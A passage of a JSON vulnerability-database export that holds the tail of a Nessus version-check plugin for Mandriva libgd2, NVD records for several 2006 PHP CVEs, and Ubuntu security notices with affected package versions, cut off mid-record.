value:\"p-cpe:/a:mandriva:linux:libgd2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgd2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgd2-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"gd-utils-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64gd2-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64gd2-devel-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64gd2-static-devel-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libgd2-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libgd2-devel-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libgd2-static-devel-2.0.33-5.4mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-10-19T11:35:59", "references": ["http://securitytracker.com/id?1016306", "http://www.ubuntu.com/usn/usn-320-1", "http://www.securityfocus.com/archive/1/447866/100/0/threaded", "http://www.redhat.com/support/errata/RHSA-2006-0682.html", "http://www.turbolinux.com/security/2006/TLSA-2006-38.txt", "http://www.mandriva.com/security/advisories?name=MDKSA-2006:122", "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc", "http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm", "http://support.avaya.com/elmodocs2/security/ASA-2006-222.htm", "http://www.securityfocus.com/bid/17843", "http://rhn.redhat.com/errata/RHSA-2006-0736.html", "http://www.php.net/release_5_1_3.php", "https://issues.rpath.com/browse/RPL-683", "http://www.redhat.com/support/errata/RHSA-2006-0669.html"], "description": "Unspecified vulnerability in session.c in PHP before 5.1.3 has unknown impact and attack vectors, related to \"certain characters in session names,\" including special characters that are frequently associated with CRLF injection, SQL injection, cross-site scripting (XSS), and HTTP response splitting vulnerabilities. NOTE: while the nature of the vulnerability is unspecified, it is likely that this is related to a violation of an expectation by PHP applications that the session name is alphanumeric, as implied in the PHP manual for session_name().", "edition": 3, "reporter": "NVD", "published": "2006-06-14T19:02:00", "title": "CVE-2006-3016", "type": "cve", "enchantments": {"score": {"modified": "2018-10-19T11:35:59", "vector": "NONE", "value": 10.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10597", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10597"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-3016"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10597", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10597"}], "modified": "2018-10-18T12:45:07", "cpe": ["cpe:/a:php_group:php:5.1.2"], "id": "CVE-2006-3016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3016", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-01T05:11:03", "references": ["http://support.avaya.com/elmodocs2/security/ASA-2006-245.htm", "http://www.securityfocus.com/archive/1/453024/100/0/threaded", "ftp://patches.sgi.com/support/free/security/advisories/20061101-01-P", "http://www.cisco.com/en/US/products/products_security_response09186a008082c4fe.html", "http://www.hardened-php.net/advisory_132006.138.html", "http://security.gentoo.org/glsa/glsa-200703-21.xml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29971", "http://www.us-cert.gov/cas/techalerts/TA06-333A.html", "http://www.cisco.com/warp/public/707/cisco-air-20070425-http.shtml", "http://www.debian.org/security/2006/dsa-1206", "http://securitytracker.com/id?1017152", "http://www.redhat.com/support/errata/RHSA-2006-0730.html", "http://www.turbolinux.com/security/2006/TLSA-2006-38.txt", "http://www.openpkg.com/security/advisories/OpenPKG-SA-2006.028.html", "http://docs.info.apple.com/article.html?artnum=304829", "http://issues.rpath.com/browse/RPL-761", "http://www.ubuntu.com/usn/usn-375-1", "http://www.redhat.com/support/errata/RHSA-2006-0731.html", "http://www.vupen.com/english/advisories/2006/4750", "http://securitytracker.com/id?1017296", "http://www.vupen.com/english/advisories/2006/4317", "http://www.securityfocus.com/bid/20879", "http://www.securityfocus.com/archive/1/450431/100/0/threaded", "http://www.vupen.com/english/advisories/2007/1546", "http://rhn.redhat.com/errata/RHSA-2006-0736.html", "http://www.mandriva.com/security/advisories?name=MDKSA-2006:196", "http://www.vupen.com/english/advisories/2006/4749", "http://www.novell.com/linux/security/advisories/2006_67_php.html", "http://www.trustix.org/errata/2006/0061/", "http://www.securityfocus.com/archive/1/451098/100/0/threaded", "http://www.php.net/releases/5_2_0.php", "http://lists.apple.com/archives/security-announce/2006/Nov/msg00001.html"], "description": "Buffer overflow in PHP before 5.2.0 allows remote attackers to execute arbitrary code via crafted UTF-8 inputs to the (1) htmlentities or (2) htmlspecialchars functions.", "edition": 5, "reporter": "NVD", "published": "2006-11-03T19:07:00", "title": "CVE-2006-5465", "type": "cve", "enchantments": {"score": {"modified": "2018-11-01T05:11:03", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10240", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10240"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-5465"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10240", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10240"}], "modified": "2018-10-30T12:25:35", "cpe": ["cpe:/a:php:php:5.0:rc3", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.0:rc1", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.0:rc2", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:5.0.0"], "id": "CVE-2006-5465", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5465", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:02", "references": ["http://www.mandriva.com/security/advisories?name=MDKSA-2006:162", "http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0046", "http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/gd_gif_in.c?view=log", "http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html", "http://rhn.redhat.com/errata/RHSA-2006-0688.html", "http://www.novell.com/linux/security/advisories/2006_52_php.html", "http://www.securityfocus.com/archive/1/447866/100/0/threaded", "http://www.securityfocus.com/bid/19582", "https://issues.rpath.com/browse/RPL-2218", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:038", "http://www.turbolinux.com/security/2006/TLSA-2006-38.txt", "http://bugs.php.net/bug.php?id=38112", "http://www.securityfocus.com/archive/1/488008/100/0/threaded", "http://www.novell.com/linux/security/advisories/2008_13_sr.html", "http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00003.html", "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc", "http://securitytracker.com/id?1016984", "http://www.securityfocus.com/archive/1/487683/100/0/threaded", "http://www.php.net/release_5_1_5.php", "http://support.avaya.com/elmodocs2/security/ASA-2006-222.htm", "http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm", "http://www.redhat.com/support/errata/RHSA-2008-0146.html", "http://wiki.rpath.com/Advisories:rPSA-2008-0046", "https://bugzilla.redhat.com/show_bug.cgi?id=431568", "http://www.vupen.com/english/advisories/2006/3318", "http://cvs.php.net/viewvc.cgi/php-src/ext/gd/libgd/gd_gif_in.c?r1=1.10&r2=1.11", "https://issues.rpath.com/browse/RPL-683", "http://www.php.net/ChangeLog-5.php#5.1.5", "https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00502.html", "http://www.ubuntu.com/usn/usn-342-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:077"], "description": "Buffer overflow in the LWZReadByte_ function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array.", "edition": 4, "reporter": "NVD", "published": "2006-08-31T17:04:00", "title": "CVE-2006-4484", "type": "cve", "enchantments": {"score": {"modified": "2018-11-01T05:11:02", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9004", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9004"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-4484"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9004", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9004"}], "modified": "2018-10-30T12:25:35", "cpe": ["cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.1.2"], "id": "CVE-2006-4484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4484", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:02", "references": ["http://rhn.redhat.com/errata/RHSA-2006-0688.html", "http://www.novell.com/linux/security/advisories/2006_52_php.html", "http://www.securityfocus.com/archive/1/447866/100/0/threaded", "http://www.redhat.com/support/errata/RHSA-2006-0682.html", "http://www.debian.org/security/2006/dsa-1206", "http://www.securityfocus.com/bid/19582", "http://www.turbolinux.com/security/2006/TLSA-2006-38.txt", "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc", "http://securitytracker.com/id?1016984", "http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm", "http://www.php.net/release_5_1_5.php", "http://support.avaya.com/elmodocs2/security/ASA-2006-222.htm", "http://cvs.php.net/viewvc.cgi/php-src/ext/standard/string.c?r1=1.445.2.14.2.10&r2=1.445.2.14.2.11", "http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm", "http://www.vupen.com/english/advisories/2006/3318", "https://issues.rpath.com/browse/RPL-683", "http://www.php.net/ChangeLog-5.php#5.1.5", "http://www.ubuntu.com/usn/usn-342-1", "http://www.redhat.com/support/errata/RHSA-2006-0669.html"], "description": "Multiple heap-based buffer overflows in the (1) str_repeat and (2) wordwrap functions in ext/standard/string.c in PHP before 5.1.5, when used on a 64-bit system, have unspecified impact and attack vectors, a different vulnerability than CVE-2006-1990.", "edition": 4, "reporter": "NVD", "published": "2006-08-31T17:04:00", "title": "CVE-2006-4482", "type": "cve", "enchantments": {"score": {"modified": "2018-11-01T05:11:02", "vector": "NONE", "value": 10.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10121", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10121"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-4482"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10121", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10121"}], "modified": "2018-10-30T12:25:35", "cpe": ["cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.1.2"], "id": "CVE-2006-4482", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4482", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-01T05:11:02", "references": ["http://www.mandriva.com/security/advisories?name=MDKSA-2006:144", "http://www.securityfocus.com/archive/1/442438/30/0/threaded", "http://rhn.redhat.com/errata/RHSA-2006-0688.html", "http://bugs.php.net/bug.php?id=38322", "http://www.novell.com/linux/security/advisories/2006_52_php.html", "http://www.redhat.com/support/errata/RHSA-2006-0682.html", "http://security.gentoo.org/glsa/glsa-200608-28.xml", "http://securityreason.com/securityalert/1341", "http://www.vupen.com/english/advisories/2006/3193", "http://www.securityfocus.com/bid/19415", "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc", "http://www.novell.com/linux/security/advisories/2006_20_sr.html", "http://securitytracker.com/id?1016984", "http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm", "http://www.novell.com/linux/security/advisories/2006_19_sr.html", "http://www.php.net/release_5_1_5.php", "http://www.plain-text.info/sscanf_bug.txt", "http://support.avaya.com/elmodocs2/security/ASA-2006-222.htm", "http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm", "http://www.novell.com/linux/security/advisories/2006_22_sr.html", "http://rhn.redhat.com/errata/RHSA-2006-0736.html", "http://www.php.net/ChangeLog-5.php#5.1.5", "http://www.ubuntu.com/usn/usn-342-1", "http://www.redhat.com/support/errata/RHSA-2006-0669.html"], "description": "scanf.c in PHP 5.1.4 and earlier, and 4.4.3 and earlier, allows context-dependent attackers to execute arbitrary code via a sscanf PHP function call that performs argument swapping, which increments an index past the end of an array and triggers a buffer over-read.", "edition": 3, "reporter": "NVD", "published": "2006-08-08T16:04:00", "title": "CVE-2006-4020", "type": "cve", "enchantments": {"score": {"modified": "2018-11-01T05:11:02", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11062", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11062"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-4020"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11062", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11062"}], "modified": "2018-10-30T12:25:35", "cpe": ["cpe:/a:php:php:5.0:rc3", "cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:4.0:beta4", "cpe:/a:php:php:5.0.0:rc1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:4.0", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.0.4:patch1", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.0:beta1", "cpe:/a:php:php:4.0.7:rc3", "cpe:/a:php:php:4.0.7:rc2", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0:rc1", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2::dev", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.0.1:patch2", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.0:rc1", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.0.0:beta3", "cpe:/a:php:php:4.0.1:patch1", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.7:rc1", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.0:beta2", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.0:rc2", "cpe:/a:php:php:5.0.0:beta1", "cpe:/a:php:php:5.0:rc2", "cpe:/a:php:php:5.0.0:rc3", "cpe:/a:php:php:4.0:beta_4_patch1", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.0.3:patch1", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:5.0.0:beta4", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:5.0.0:beta2", "cpe:/a:php:php:4.0:beta3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.0.0:rc2", "cpe:/a:php:php:4.0.6"], "id": "CVE-2006-4020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4020", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:02", "references": ["http://www.ubuntu.com/usn/usn-362-1", "http://rhn.redhat.com/errata/RHSA-2006-0688.html", "http://www.novell.com/linux/security/advisories/2006_52_php.html", "http://www.securityfocus.com/archive/1/447866/100/0/threaded", "http://www.redhat.com/support/errata/RHSA-2006-0682.html", "http://www.securityfocus.com/bid/19582", "http://www.turbolinux.com/security/2006/TLSA-2006-38.txt", "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-P.asc", "http://securitytracker.com/id?1016984", "http://support.avaya.com/elmodocs2/security/ASA-2006-221.htm", "http://support.avaya.com/elmodocs2/security/ASA-2006-222.htm", "http://support.avaya.com/elmodocs2/security/ASA-2006-223.htm", "http://www.hardened-php.net/hphp/changelog.html#hardening_patch_0.4.14", "http://www.php.net/release_5_1_6.php", "https://issues.rpath.com/browse/RPL-683", "http://www.php.net/ChangeLog-5.php#5.1.6", "http://www.redhat.com/support/errata/RHSA-2006-0669.html", "http://www.debian.org/security/2007/dsa-1331"], "description": "Integer overflow in memory allocation routines in PHP before 5.1.6, when running on a 64-bit system, allows context-dependent attackers to bypass the memory_limit restriction.", "edition": 4, "reporter": "NVD", "published": "2006-08-31T17:04:00", "title": "CVE-2006-4486", "type": "cve", "enchantments": {"score": {"modified": "2018-11-01T05:11:02", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11086", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11086"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-4486"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11086", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11086"}], "modified": "2018-10-30T12:25:35", "cpe": ["cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.1.2"], "id": "CVE-2006-4486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4486", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:12", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4481", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4484", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4020", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4482"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.0.5-2ubuntu1.4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-curl - 5.1.2-1ubuntu3.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi - 5.1.2-1ubuntu3.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.1.2-1ubuntu3.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cgi - 4:4.3.10-10ubuntu4.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php4 - 4:4.3.10-10ubuntu4.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.1.2-1ubuntu3.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-curl - 5.0.5-2ubuntu1.4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php4-cli - 4:4.3.10-10ubuntu4.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.0.5-2ubuntu1.4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi - 5.0.5-2ubuntu1.4", "operator": "lt"}], "description": "The sscanf() function did not properly check array boundaries. In applications which use sscanf() with argument swapping, a remote attacker could potentially exploit this to crash the affected web application or even execute arbitrary code with the application\u2019s privileges. (CVE-2006-4020)\n\nThe file_exists() and imap_reopen() functions did not perform proper open_basedir and safe_mode checks which could allow local scripts to bypass intended restrictions. (CVE-2006-4481)\n\nOn 64 bit systems the str_repeat() and wordwrap() functions did not properly check buffer boundaries. Depending on the application, this could potentially be exploited to execute arbitrary code with the applications\u2019 privileges. This only affects the amd64 and sparc platforms. (CVE-2006-4482)\n\nA buffer overflow was discovered in the LWZReadByte_() function of the GIF image file parser. By tricking a PHP application into processing a specially crafted GIF image, a remote attacker could exploit this to execute arbitrary code with the application\u2019s privileges. (CVE-2006-4484)", "edition": 3, "reporter": "Ubuntu", "published": "2006-09-07T00:00:00", "title": "PHP vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-4484", "CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2006-09-07T00:00:00", "id": "USN-342-1", "href": "https://usn.ubuntu.com/342-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-09T00:18:35", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2006-5465"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.1.2-1ubuntu3.4", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.0.5-2ubuntu1.6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.1.6-1ubuntu2.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.0.5-2ubuntu1.6", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.1.6-1ubuntu2.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.1.2-1ubuntu3.4", "operator": "lt"}], "description": "Stefan Esser discovered two buffer overflows in the htmlentities() and htmlspecialchars() functions. By supplying specially crafted input to PHP applications which process that input with these functions, a remote attacker could potentially exploit this to execute arbitrary code with the privileges of the application. (CVE-2006-5465)\n\nThis update also fixes bugs in the chdir() and tempnam() functions, which did not perform proper open_basedir checks. This could allow local scripts to bypass intended restrictions.", "edition": 5, "reporter": "Ubuntu", "published": "2006-11-03T00:00:00", "title": "PHP vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465", "CVE-2006-5706"], "modified": "2006-11-03T00:00:00", "id": "USN-375-1", "href": "https://usn.ubuntu.com/375-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:28", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4486", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4485", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4625", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-4812"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.1.2-1ubuntu3.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi - 5.1.2-1ubuntu3.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi - 5.0.5-2ubuntu1.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.0.5-2ubuntu1.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5 - 5.1.2-1ubuntu3.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli - 5.0.5-2ubuntu1.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": 